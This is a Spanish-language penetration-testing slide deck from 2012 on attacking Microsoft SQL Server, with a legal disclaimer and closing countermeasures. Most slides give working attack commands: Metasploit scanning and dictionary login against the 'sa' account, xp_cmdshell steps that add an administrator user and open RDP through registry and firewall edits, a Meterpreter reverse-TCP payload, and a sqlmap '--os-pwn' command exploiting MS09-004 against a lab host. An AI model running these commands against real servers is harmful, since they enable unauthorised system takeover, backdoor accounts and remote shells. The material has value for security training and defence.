Sunteți pe pagina 1din 19

Vulnerando Microsoft SQL Server

Microsoft SQL Server: Anlisis y tcnicas de penetration testing


Julio, 2012

Omar Palomino
omarc320@gmail.com opalomino@kunak.com.pe

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Ing. Sistemas y Maestrista de Ing. de Computacin y Sistemas, CEH, Security+, ITIL v3. Consultor en seguridad de informacin de KUNAK Consulting. Psiclogo que aun no comienza sus estudios. Escritor en mis tiempos libres: http://www.el-palomo.com
http://www.facebook.com/El.Palomo.Seguridad.Informacion

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

AVISO Y CONSIDERACIONES LEGALES

Las tcnicas mostradas en la presentacin tienen por objetivo CONOCER las tcnicas utilizadas por los hackers para penetrar y aduearse de SO y BD Microsoft. La presentacin NO TIENE POR OBJETIVO ensear tcnicas para realizar ataques contra, SO, Base de datos o aplicaciones web que son penados segn la legislacin de cada pas. El autor no se hace responsable del mal uso de las tcnicas mostradas en la presentacin.

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

Descripcin

Encontrar bases de datos MSSQL a travs de NMAP (video) Encontrar bases de datos MSSQL a travs de Nessus (video) Encontrar bases de datos MSSQL a travs de Metasploit Identificar sistema operativo sobre la cual se ejecuta la BD Automatizacin de ataque con Metasploit Framework para lograr acceso a la base de datos a travs de un diccionario de contraseas

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

Mdulo de Metasploit

OPCIONES DE ESCNEO CON METASPLOIT


msf>use auxiliary/scanner/mssql/mssql_ping msf>show options msf>set RHOSTS msf>set THREADS msf>exploit.

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

Mdulo de Metasploit

OPCIONES DE INGRESO A MSSQL CON METASPLOIT msf>use auxiliary/scanner/mssql/mssql_login msf>set RHOST msf>set THREADS msf>set PASS FILE /pentest/file.txt msf>set RPORT 1433 msf>set USERNAME sa msf>expoit

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

Introduccin

Ejecucin de comandos va XP_CMDSHELL de manera manual - La automatizacin de tareas es una buena idea pero es bueno tambin aprender como hacerlo manualmente si es que no contamos con alguna herramienta de explotacin automatizada a la mano. Ejecucin del exploit MSSQL_PAYLOAD y el payload METERPRETER - Uso de la suite de Metasploit para apoderarse del sistema operativo a travs de Microsoft SQL Server

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

XP_CMDSHELL

Ejecucin de comandos va XP_CMDSHELL de manera manual:


Establecer una conexin mediante un cliente Activar el uso de la funcin extendida XP_CMDSHELL Interactuar con el sistema operativo Crear usuarios/grupos de acceso al servidor Establecer una conexin remota va RDP

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

XP_CMDSHELL

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

XP_CMDSHELL
EXEC master.dbo.sp_configure show advanced options, 1 RECONFIGURE EXEC master.dbo.sp_configure xp_cmdshell, 1 RECONFIGURE EXEC xp_cmdshell net user martin P@ssworD /ADD EXEC xp_cmdshell net group Administrators martin /ADD ########### HABILITAR RDP ################
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f

########### HABILITAR FIREWALL ################ netsh firewall show portopening netsh firewall add portopening TCP 3389 "Remote Desktop" ENABLE ALL

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

USO DE METERPRETER

Ejecucin del exploit MSSQL_PAYLOAD y el payload METERPRETER


msf> use exploit/windoes/mssql/mssql_payload msf> set RHOST 192.168.220.130 msf> set RPORT 1433 msf> set USERNAME sa msf> set PASSWORD password msf> set PAYLOAD windows/meterpreter/reverse_tcp msf> SET LHOST msf> set LPORT 443 msf> exploit

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

USO DE METERPRETER

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

Introduccin

Explotacin de la vulnerabilidad MS09_004 a travs de SQL Injection - La vulnerabilidad se presenta en los motores de base de datos de Microsoft SQL Server 2005 que no hayan sido actualizados a la versin SP3. - La vulnerabilidad es detectada por Nessus y puede ser explotado a travs de dos mtodos:
SQLMAP: Herramienta para realizar SQLi (hace uso de Metasploit) Metasploit: Directamente a travs de la consola MSFCONSOLE. http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

USO DE METERPRETER y SQLMAP

NOTAS IMPORTANTES:
1) No se requiere un usuario y/o contrasea para explotar esta vulnerabilidad. 2) El lenguaje de programacin de la aplicacin web es indiferente.
http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

USO DE METERPRETER y SQLMAP

Comando a ejecutar: ./sqlmap.py --url="http://192.168.220.129/hijacking/detalle.php?id=9" --level=5 --risk=3 -p id -cookie="PHPSESSID=4go1oqlc2882dsj09not61o0l5" --dbms=mssql --threads=10 --os-pwn -v 3 --msfpath=/pentest/exploits/framework/

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

USO DE METERPRETER y SQLMAP

Comando a ejecutar: ./sqlmap.py --url="http://192.168.220.129/hijacking/detalle.php?id=9" --level=5 --risk=3 -p id -cookie="PHPSESSID=4go1oqlc2882dsj09not61o0l5" --dbms=mssql --threads=10 --os-pwn -v 3 --msfpath=/pentest/exploits/framework/

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Escaneo y reconocimiento de MSSQL

Ataques directos a la Base de Datos

Ataques a travs de SQL Injection

Conclusiones y contramedidas

CONCLUSIONES
Existen diversos mecanismos para explotar una BD SQL Server, a travs de: Explotar directamente la BD Explotar aplicacin web con SQL Injection: PHP ASP.NET JAVA El uso del procedimiento extendido XP_CMDSHELL es muy importante para la explotacin de vulnerabilidades por lo que se recomienda restringir el uso del mismo. Se debe actualizar el motor de BD para disminuir el riesgo de ataques sobre las mismas. Un proceso continuo de revisin es la solucin ideal para evitar ser vulnerables ante un eventual ataque de seguridad de informacin.

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Puedes ver este video en:


http://www.el-palomo.com/ http://www.facebook.com/El.Palomo.Seguridad.Informacion/ http://www.youtube.com/user/youta18

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

Vulnerando Microsoft SQL Server

Microsoft SQL Server: Anlisis y tcnicas de penetration testing


Julio, 2012

Omar Palomino
omarc320@gmail.com opalomino@kunak.com.pe

http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

S-ar putea să vă placă și